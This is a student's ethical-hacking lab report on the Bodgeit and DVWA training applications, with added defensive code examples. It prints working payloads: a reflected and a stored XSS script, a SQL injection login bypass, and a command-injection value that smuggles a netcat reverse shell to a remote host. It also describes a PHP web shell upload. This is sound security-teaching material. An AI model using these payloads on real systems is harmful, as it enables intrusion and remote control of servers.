Ethical Hacking Challenges by Rachit Goyal

Deakin University

Ethical Hacking
OnTrack Submission

Task 8.1P

Submitted By: Rachit Goyal (s222187269)
Tutor: Muna Al-hawawreh
2024/09/14 05:49

September 14, 2024

Produced by Doubtfire
WEEK 8 – TASK P
Answer Sheet
Your Name: Rachit Goyal

A: Hacking web Applications

1. Exploiting many vulnerabilities with web application

Task A1: First Challenge - Find Diagnostic Data

Appending the ‘?debug=true’ parameter to the end of the login page URL doesn’t
change anything, which means that debug is not enabled for this login page.

The About page also shows no difference, which means that the About page also has the
debug option disabled.
The Contact page also has the debug option disabled.

On the Login page we can see that adding the debug parameter to the URL shows the debug
value as ‘clear’ in the page, which means that the Login page has the debug option enabled.

The Basket page also shows the debug value, which is ‘basketid = 2’, meaning the basket id is
set to value 2, which means that the Basket page also has the debug option enabled.
The Search page shows no different result, which means that the Search page also
doesn’t have the debug option enabled.

Finally, the score page shows that the following diagnostic data challenge is solved.

As the debug option allows an external user to view diagnostic details of the page that
shouldn’t be visible to external users, this vulnerability can be classified as a
Security Misconfiguration vulnerability from the OWASP Top 10 list.

Task A2: Second Challenge – Level 1 - Display a Pop-Up Box

On the search page we can see that the input data is reflected on the page after
clicking the search button, so this can be a good vector to inject a Cross-Site Scripting
(XSS) payload.
I entered the payload <script>alert("XSS")</script> in the search box, and on
submitting it pops a browser alert box containing our injected string ‘XSS’.

This alert box containing the ‘XSS’ string proves that our provided payload
<script>alert("XSS")</script> is successfully injected into the page and executes JS
code which pops the following alert box.
The score page shows that the challenge is completed.

To prevent this Cross-Site Scripting vulnerability, the developer must implement
security measures like user input filtering, restricting the reflection of user-provided
data, HTML encoding user-controlled data before sending it to the front end, and
implementing a proper Content Security Policy (CSP) for the browser.
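As an added illustration of the encoding and CSP measures just listed (example code, not part of the report or of the Bodgeit application), the snippet below renders the reflected search page two ways: the raw rendering lets the report's payload execute, while the hardened rendering encodes the value for each HTML context and adds a CSP header. The page markup and header values are constructed for the example.

```python
import html

# Constructed stand-in for the search page from Task A2. The payload is the
# one used in the report; everything else is sample markup for the example.
PAYLOAD = '<script>alert("XSS")</script>'


def render_unsafe(query: str) -> str:
    """Vulnerable: the query is concatenated straight into the HTML, so a
    <script> tag in it becomes a real script element in the page."""
    return f"<h2>Results for {query}</h2><input name='q' value='{query}'>"


def render_safe(query: str) -> str:
    """Hardened: encode the value for the context it lands in.
    Text nodes need & < > encoded; quoted attribute values also need the
    quote characters encoded so the input cannot break out of the attribute."""
    body = html.escape(query, quote=False)
    attr = html.escape(query, quote=True)
    return f"<h2>Results for {body}</h2><input name='q' value='{attr}'>"


def csp_header() -> dict:
    """Defence in depth: a policy with no 'unsafe-inline' means the browser
    refuses to run inline <script> blocks even if encoding is missed somewhere."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; object-src 'none'"
    }


def contains_live_script(page: str) -> bool:
    """Check used to compare the two renderings: is there a raw <script tag?"""
    return "<script" in page.lower()
```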

Task A3: Third Challenge – Level 2 – Display a Pop-Up Box

In the application I found a registration page where I can register a new user, which
can be a vector for a Stored Cross-Site Scripting vulnerability.

Here I entered a payload in the username for registering a new user,
test@[Link]<script>alert("XSS")</script>, and on registering the user it popped
the alert box containing the ‘XSS’ string, which proves that it is vulnerable to Stored XSS.
It is a Stored XSS vulnerability because the payload is stored in the username of the
new user, and if any other user views the profile of this new user the payload will be
executed in that user’s browser, making them a victim of this vulnerability.

We can see that the score page has also marked this challenge as solved.

Task A4: Fourth Challenge: login as test@[Link]

As I only know the username and not the password, I tried to perform a SQL injection
attack on the login page to log in as the ‘test@[Link]’ user. So I entered the
payload (test@[Link]' OR '1'='1) in the username field and tried to log in
leaving the password field empty.

And here we can see that I successfully got access to the user account
without the password, which means that the application is vulnerable to SQL
injection.

The payload entered in the username broke the SQL query at the backend. The
single quote (') after the original username closes the username string in the SQL
query, and (OR '1'='1) makes the statement always return true, bypassing the
requirement for a password. Hence we get logged in without needing the password.

We can see that the score page marks this challenge as complete.
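To show concretely why the quote in the username changes the query, here is an added example (not the Bodgeit code, and not from the report) of a login check built by string concatenation next to the same check with bound parameters. The users table, the password and the example.com domain standing in for the redacted one are constructed sample data.

```python
import sqlite3

# Constructed for this example: the report's username payload with the
# redacted domain replaced by example.com.
INJECTED_USER = "test@example.com' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account (plaintext password
    only to keep the example short; a real application compares hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('test@example.com', 'S3cret!')")
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Concatenation: the quote in the username ends the string literal early,
    so the rest of the input becomes SQL instead of data."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable check: an empty password still yields a row because the
    injected OR clause is evaluated as part of the WHERE condition."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: bound parameters keep the quote inside the data, so the
    database looks for a user literally named "test@example.com' OR '1'='1"."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None
```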

Task A5: Provide screenshots that show that you successfully finish all
these 4 challenges.

This score page shows that all the mentioned four challenges are completed.

Task A6: Creating reverse shell from vulnerable web application

I started a NetCat listener on my Kali machine.


In the command injection section, I entered the following payload (;/bin/[Link] -
e /bin/bash [Link] 1337 &), which includes a semicolon that signifies the end
of one command and allows a second command to be provided on the same line. So our
provided payload will break out of the ping command that is executed at the
backend and execute a second command, a reverse shell command, which will
send a ‘bash’ shell connection to the provided IP address ([Link]) on port 1337,
allowing the remote device to execute any system command on this device
remotely.

Executing the ‘id’ & ‘whoami’ commands reveals that I have the ‘_dvwa’ user privilege,
which is a restricted web server user created for the DVWA application only. As an ethical
hacker I can either try to perform privilege escalation techniques to increase my
privilege level, or I can report the code injection vulnerability to the
concerned authority along with its mitigation, which will allow them to fix it.

Task A7: Upload web shell file and inclusion

I modified the PHP web shell IP & port.

Then I uploaded the web shell and found that there was no restriction on the file upload
functionality, as it successfully uploaded the PHP file without any restriction.
On executing the uploaded web shell I got the reverse connection on my NetCat
listener.

This proves that the file upload vulnerability was exploited successfully and we get to
execute system commands via a reverse connection from the server.
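The upload functionality above accepted a PHP file unchecked. As an added example of the server-side checks that would have stopped it (example code, not DVWA's own), the function below accepts only image extensions, requires the content to start with the matching image signature, rejects embedded PHP tags, and stores the file under a random name. The signatures, size limit and sample file bytes are constructed for the example.

```python
import os
import secrets

# Allow-list of extensions with the magic bytes each file type must begin with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024  # sample limit for this example


def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason). The client's Content-Type header is never
    consulted, because the uploader controls it."""
    # Path separators or a NUL byte in the name point at path or parser tricks.
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "suspicious characters in filename"
    # Only the final extension matters to the web server, so only it is checked.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed"
    if len(content) == 0 or len(content) > MAX_BYTES:
        return False, "empty or oversized file"
    # A .jpg name with non-JPEG bytes is a renamed script, not an image.
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    # Defence in depth against image/PHP polyglots that carry a valid header.
    if b"<?php" in content:
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Random server-side name with the validated extension; the uploader's
    filename never reaches the filesystem."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext
```

In a deployment the upload directory should additionally be served without script execution, so that a file which slips past these checks is only ever returned as static content.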

Task C1:

This week helped me a lot in learning about various web application vulnerabilities
by practically solving challenges on the DVWA & Bodgeit applications. The most
important thing that I learned from this was the unrestricted file upload vulnerability,
which can lead to severe threats like code execution by uploading a web shell.

The content of this module has definitely helped me to organise my thoughts and to
build a proper methodology for exploiting a web application, and also helped me to
figure out possible remediations, which will help me in real-world engagements.
